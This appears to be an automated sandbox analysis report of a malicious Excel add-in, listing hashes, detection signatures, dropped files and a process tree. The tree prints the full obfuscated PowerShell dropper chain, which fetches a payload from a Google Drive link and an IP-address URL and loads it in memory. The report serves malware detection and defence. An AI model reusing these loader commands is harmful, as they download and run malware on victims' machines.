Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    07-11-2024 03:16

General

  • Target

    cea5afd13b92e129cb92104427d1d7915c5ccce1ba85ef314f2db1d6e115b456.xlam

  • Size

    673KB

  • MD5

    132a3570cc09c2e1e315e008004a0d1e

  • SHA1

    3866bceec9cf288999c245fe6949b9d0ce42ca0b

  • SHA256

    cea5afd13b92e129cb92104427d1d7915c5ccce1ba85ef314f2db1d6e115b456

  • SHA512

    fa2a60743b3c4112fbccb1393b5d165520a8f12c7e664e070e70d16f9b0cf0eab586314506d16d9f80140c1f9cf411bcc8067beb6b78111ea23ca11a83e6a0fe

  • SSDEEP

    12288:dZKLu8Y8imd6uYl3In1Ap9/GPpzDBcm86yUsMDbGjNgGcivN3h8f4Js:/KPY8TwDVm1k9/GdBurUNDghvj8P

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1zxD-qVXvvO25GmV9m6xLhdVhXRzA0JEe

exe.dropper

https://drive.google.com/uc?export=download&id=1zxD-qVXvvO25GmV9m6xLhdVhXRzA0JEe

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cea5afd13b92e129cb92104427d1d7915c5ccce1ba85ef314f2db1d6e115b456.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2372
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\jsmightbegreat.js"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBOAHYAbwBLAGUALQBFAFgAUABSAGUAcwBzAEkATwBOACAAKAAgACgAKAAnAE0ARABnAGkAbQBhAGcAZQBVAHIAbAAnACsAJwAgAD0AIABsAFkAdABoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUAJwArACcALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgAnACsAJwB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQB6AHgARAAtAHEAVgBYAHYAdgBPADIANQBHAG0AVgA5AG0ANgB4AEwAaABkAFYAaABYAFIAegAnACsAJwBBADAASgBFAGUAIABsAFkAdAA7AE0ARABnAHcAZQBiAEMAbAAnACsAJwBpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTAHkAcwB0AGUAbQAuACcAKwAnAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBNAEQAZwBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAE0ARABnAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABNAEQAZwBpAG0AYQBnAGUAVQByAGwAKQA7AE0ARABnAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAJwArACcAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAE0ARABnAGkAJwArACcAbQBhAGcAZQBCAHkAdABlAHMAKQA7AE0ARABnAHMAdABhAHIAJwArACcAdABGAGwAYQBnACAAPQAgAGwAWQB0ADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AbABZAHQAOwBNAEQAJwArACcAZwBlAG4AZABGAGwAYQBnACAAPQAgAGwAWQB0ADwAPABCAEEAUwBFACcAKwAnADYANABfAEUATgBEAD4APgBsAFkAdAA7AE0ARABnAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAATQBEAGcAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgATQBEAGcAcwB0AGEAcgB0AEYAbABhAGcAKQA7AE0ARABnAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABNAEQAZwBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABNAEQAZwBlAG4AZABGAGwAYQBnACkAOwBNAEQAZwBzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACcAKwAnAE0ARABnAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAATQBEAGcAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AE0ARABnAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABNAEQAZwBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsATQBEAGcAYgBhAHMAZQA2ADQATABlAG4AZwAnACsAJwB0AGgAIAA9ACAATQBEAGcAZQBuAGQASQBuAGQAZQB4ACAALQAgAE0ARABnACcAKwAnAHMAdABhAHIAdABJAG4AZABlAHgAOwBNAEQAZwBiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkACAAPQAgAE0ARABnAGkAbQBhAGcAZQAnACsAJwBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABNAEQAZwBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABNAEQAZwBiAGEAcwBlADYANABMAGUAJwArACcAbgBnAHQAaAApADsATQBEAGcAYgBhACcAKwAnAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgATQBEAGcAJwArACcAYgBhACcAKwAnAHMAZQA2ADQAJwArACcAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACcAKwAnACkAIABTAEoAdgAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABNAEQAZwBfACAAfQApAFsALQAxAC4ALgAtACgATQBEAGcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AE0ARABnAGMAJwArACcAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKABNAEQAZwBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AE0ARABnAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgATQBEAGcAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AE0ARABnAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AJwArACcAZQBdAC4ARwBlAHQATQBlAHQAaAAnACsAJwBvAGQAKABsAFkAdABWAEEASQBsAFkAdAApADsATQBEAGcAdgAnACsAJwBhAGkATQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoAE0ARABnAG4AdQBsAGwALAAgAEAAKABsAFkAdAAnACsAJwB0AHgAdAAuAGcAZwBnAGkAYgBlAG0AZQBtAGUAZQBlAC8ANwAxADIALgAzADEAMQAuADAAMgAxAC4ANwA4AC8ALwAnACsAJwA6AHAAdAB0AGgAbABZAHQALAAgAGwAWQB0AGQAJwArACcAZQBzAGEAdABpACcAKwAnAHYAYQBkAG8AbABZAHQALAAgAGwAWQB0AGQAZQBzAGEAJwArACcAdABpAHYAYQBkAG8AbABZAHQALAAgAGwAWQB0AGQAZQBzAGEAdABpAHYAYQBkAG8AbABZAHQALAAgAGwAWQB0ACcAKwAnAE0AUwBCAHUAaQBsACcAKwAnAGQAbABZAHQALAAgAGwAWQB0AGQAZQBzAGEAdABpAHYAYQBkAG8AbABZAHQALAAgAGwAWQB0AGQAZQBzAGEAdABpAHYAYQBkAG8AbABZAHQALABsAFkAdABkAGUAcwBhAHQAaQB2AGEAZABvAGwAWQB0ACwAbABZAHQAZABlAHMAYQB0AGkAdgBhAGQAbwBsAFkAdAAsAGwAWQAnACsAJwB0AGQAZQBzAGEAdABpAHYAYQBkAG8AbABZAHQALABsAFkAdABkAGUAcwBhAHQAaQB2AGEAZABvAGwAWQB0ACwAbABZAHQAZABlAHMAYQB0AGkAdgBhAGQAbwBsAFkAdAAsAGwAWQB0ADEAbABZAHQALABsAFkAdABkAGUAcwBhACcAKwAnAHQAaQB2AGEAZABvAGwAWQB0ACkAKQA7ACcAKQAgAC0AQwByAGUAcABsAEEAQwBFACAAJwBNAEQAZwAnACwAWwBjAEgAYQByAF0AMwA2AC0AUgBFAHAATABhAEMARQAgACcAbABZAHQAJwAsAFsAYwBIAGEAcgBdADMAOQAgACAALQBSAEUAcABMAGEAQwBFACgAWwBjAEgAYQByAF0AOAAzACsAWwBjAEgAYQByAF0ANwA0ACsAWwBjAEgAYQByAF0AMQAxADgAKQAsAFsAYwBIAGEAcgBdADEAMgA0ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INvoKe-EXPRessION ( (('MDgimageUrl'+' = lYthttps://drive.google'+'.com/uc?expor'+'t=download&id=1zxD-qVXvvO25GmV9m6xLhdVhXRz'+'A0JEe lYt;MDgwebCl'+'ient = New-Object'+' System.'+'Net.WebClient;MDgimageBytes = MDgwebClient.DownloadData(MDgimageUrl);MDgimageText = [System.Text.Enc'+'oding]::UTF8.GetString(MDgi'+'mageBytes);MDgstar'+'tFlag = lYt<<BASE64_START>>lYt;MD'+'gendFlag = lYt<<BASE'+'64_END>>lYt;MDgstartIndex = MDgimageText.IndexOf(MDgstartFlag);MDgendInd'+'ex = MDgimageText.IndexOf(MDgendFlag);MDgstartIndex -ge 0 -and '+'MDgendIndex -gt MDgstartIndex;MDgstartIndex += MDgstartFlag.Length;MDgbase64Leng'+'th = MDgendIndex - MDg'+'startIndex;MDgbase64Com'+'mand = MDgimage'+'Text.Substring(MDgstartIndex, MDgbase64Le'+'ngth);MDgba'+'se64Reversed = -join (MDg'+'ba'+'se64'+'Command.ToCharArray('+') SJv ForEach-Object { MDg_ })[-1..-(MDgbase64Command.Length)];MDgc'+'ommandBytes = [System.Convert]::FromBase64Strin'+'g(MDgbase64Reversed);MDgloadedAssembly = [System.Reflection.Assembly]::Load(MDgcommandBytes);MDgvaiMethod = [dnlib.IO.Hom'+'e].GetMeth'+'od(lYtVAIlYt);MDgv'+'aiMethod.Invoke(MDgnull, @(lYt'+'txt.gggibememeee/712.311.021.78//'+':ptthlYt, lYtd'+'esati'+'vadolYt, lYtdesa'+'tivadolYt, lYtdesativadolYt, lYt'+'MSBuil'+'dlYt, lYtdesativadolYt, lYtdesativadolYt,lYtdesativadolYt,lYtdesativadolYt,lY'+'tdesativadolYt,lYtdesativadolYt,lYtdesativadolYt,lYt1lYt,lYtdesa'+'tivadolYt));') -CreplACE 'MDg',[cHar]36-REpLaCE 'lYt',[cHar]39 -REpLaCE([cHar]83+[cHar]74+[cHar]118),[cHar]124))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2732

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    2512dbc7403bda8870f157d53dd80759

    SHA1

    671a0b79c96c0fe9189ed0892bd63b69bb50e775

    SHA256

    2dca98140fc8119a9720740653cecce3796a996a6de254965c3362f6dc9b4c6c

    SHA512

    62d63419c9b7cf148991da2406d2b980db2f3b7d5f2af8c9cd3194ebf0f6bb3120a0a51529458ac5e683aeaa7151ca1e056185b6c951f1c892cc41de4806a279

  • C:\Users\Admin\AppData\Roaming\jsmightbegreat.js

    Filesize

    134KB

    MD5

    b3366fa7bcac873475b28f94d0bcc124

    SHA1

    cf34acfc400c0137296e99ecd87bac744b88777f

    SHA256

    1c2a877e92f19759b8b24d022f5f9d13a8c96eb8d7dacd48b7710e55a3f28747

    SHA512

    e1bc868aaba2d06f84d5467af69b18b56721955a4ec0a0fb07aa11485f37d61024ea8e3bbebf1a3c180b491d32434ca19d5b323e08f29027c790821fce3531f6

  • memory/2372-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2372-1-0x000000007208D000-0x0000000072098000-memory.dmp

    Filesize

    44KB

  • memory/2372-16-0x000000007208D000-0x0000000072098000-memory.dmp

    Filesize

    44KB